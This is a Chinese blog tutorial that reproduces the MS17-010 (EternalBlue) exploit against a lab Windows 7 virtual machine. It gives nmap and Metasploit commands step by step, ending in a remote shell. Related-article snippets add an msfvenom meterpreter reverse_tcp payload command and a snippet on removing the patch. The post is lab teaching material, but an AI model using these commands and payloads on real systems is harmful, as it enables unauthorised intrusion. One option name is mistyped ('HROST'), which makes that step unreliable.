基于MS17_010(永恒之蓝)的一次渗透测试

最新推荐文章于 2024-06-24 15:26:14 发布
最新推荐文章于 2024-06-24 15:26:14 发布
阅读量2.1k 收藏 11
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915762/article/details/86619485
版权

工具和环境:

  • Nmap端口扫描器
  • Metasploit漏洞检测工具
  • Kali Linux(前面的两样工具都在Kali Linux中有集成,是攻击机)
  • Windows 7(作为被攻击机,IP地址为:192.168.229.134)
  • VMware虚拟机
1. 打开Kali Linux的命令行输入框,在命令行中输入 "nmap -sV 192.168.229.134"扫描Windows7(被攻击机)开放的端口以及其余相关信息

扫描端口信息

2. 可以看到,被攻击机的 445 端口是开放的,由此可以判断可以基于MS17_010进行"永恒之蓝攻击"
3. 输入"msfconsole"进入 Metasploit 命令行操作

在这里插入图片描述

4. 输入 “search ms17_010” 搜索与该漏洞相关的代码库 (注:auxiliary开头的代码是辅助功能代码;exploit开头的是我们将要使用的渗透代码)

在这里插入图片描述

5. 输入 “use exploit/windows/smb/ms17_010_eternalblue” 调用该渗透代码

在这里插入图片描述

6. 输入 “show options” 查看该代码可以使用的参数,为后面设置某些参数做参考

在这里插入图片描述

7. 输入 "set HROST 192.168.229.134"设置攻击对象的IP地址,本实验中就是把该参数设为Windows 7的IP地址

在这里插入图片描述

8. 输入 “exploit”,就是把上面设置好参数的代码注入给被攻击机(Windows 7)进行渗透,最后可以获取到Windows 7的控制权,返回了Windows 7的shell界面,在上面可以进行命令行的操作,攻击成功

在这里插入图片描述
注:不同的主机攻击效果可能不同,本实验还有一种攻击结果是被攻击机蓝屏

YT--98
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
永恒之蓝ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1047
metasploit使用以及复现永恒之蓝漏洞
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
dzqxwzoe的博客
05-31 1077
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3444
永恒之蓝
二、永恒之蓝漏洞
qq_59235193的博客
02-02 343
本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
ms17-010永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1781
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010,漏洞检测工具
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝检测工具MS17-010漏洞扫描工具"是一款专门用于检测和识别该漏洞的软件。此工具的主要功能包括: 1. **自动扫描**:该工具能够自动扫描网络上的所有Windows设备,检测是否存在MS17-010漏洞。 2. **实时报告...
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
永恒之蓝Windows10版初探
crowsec
03-15 1291
永恒之蓝(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之蓝漏洞复现,99%的师傅选择的都是Windows7或者。
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
渗透测试MS17_010永恒之蓝)漏洞复现与分析】
qq_61947585的博客
07-14 1537
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝ms17_010)为例
weoptions的博客
09-21 4495
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
Metasploit永恒之蓝[ms17_010]Windows7渗透实验
EnerY3的博客
11-16 320
永恒之蓝是一种计算机网络安全漏洞。它主要影响Windows操作系统,包括本次的实验对象Windows7。[ms17_010]:windows2017年的第10号漏洞。
永恒之蓝漏洞复现测试
m0_60547686的博客
08-12 393
永恒之蓝MS17-010漏洞复现及利用 一、什么是永恒之蓝永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 二、复现
[永恒之蓝]实战-漏洞复现
dzqxwzoe的博客
01-05 242
在这里插入图片描述](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bf14b5b946b44c268c0c133b32846438~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image" style=“margin: auto” />2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击" style=“margin: auto” />
ms17_010扫描工具
qq_34450601的博客
05-09 3296
ms17_010扫描工具msf中的辅助模块含有一个强大的ms17_010扫描工具:auxiliary/scanner/smb/smb_ms17_010使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254 就可以了。具体...
永恒之蓝漏洞属于什么漏洞/永恒之蓝漏洞检测工具-零基础攻防笔记
最新发布
程序员三九的博客
06-24 405
项目三 永恒之蓝漏洞利用.docx,永恒之蓝漏洞利用 本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metasploit工具的使用,知道永恒之蓝的漏洞利用原理。
如何删除ms17_010(永恒之蓝)漏洞的补丁
02-16
要删除ms17_010永恒之蓝)漏洞的补丁,您可以按照以下步骤进行操作: 1. 打开控制面板:在Windows操作系统中,点击开始菜单,然后选择控制面板。 2. 打开程序和功能:在控制面板中,找到并点击“程序”或“程序...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值